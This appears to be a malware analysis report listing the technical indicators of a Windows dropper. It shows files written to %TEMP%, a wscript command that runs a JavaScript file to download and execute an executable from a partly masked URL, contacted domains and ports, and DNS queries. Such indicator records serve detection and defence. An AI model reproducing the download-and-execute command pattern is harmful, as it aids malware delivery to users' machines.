Technical Information
- '%TEMP%\ToX1.exe' -domain=xteWaaaJWa.com -event=2 -file=installer -ip=52.1.45.42:80 -s=1
- '%TEMP%\ToX1.exe' (downloaded from the Internet)
- '<SYSTEM32>\wscript.exe' "%TEMP%\ToX1.js" http://www.dj##p.info/?do############################################################### %TEMP%\ToX1.exe
- %TEMP%\ToX1.exe
- %TEMP%\ToX1.js
- %TEMP%\ToX1.js
- 'bi.##wnthat.com':80
- 'localhost':1039
- 'www.dj##p.info':80
- http://bi.##wnthat.com/?sc#######################
- http://www.dj##p.info/?do########################################################################
- DNS ASK bi.##wnthat.com
- DNS ASK www.dj##p.info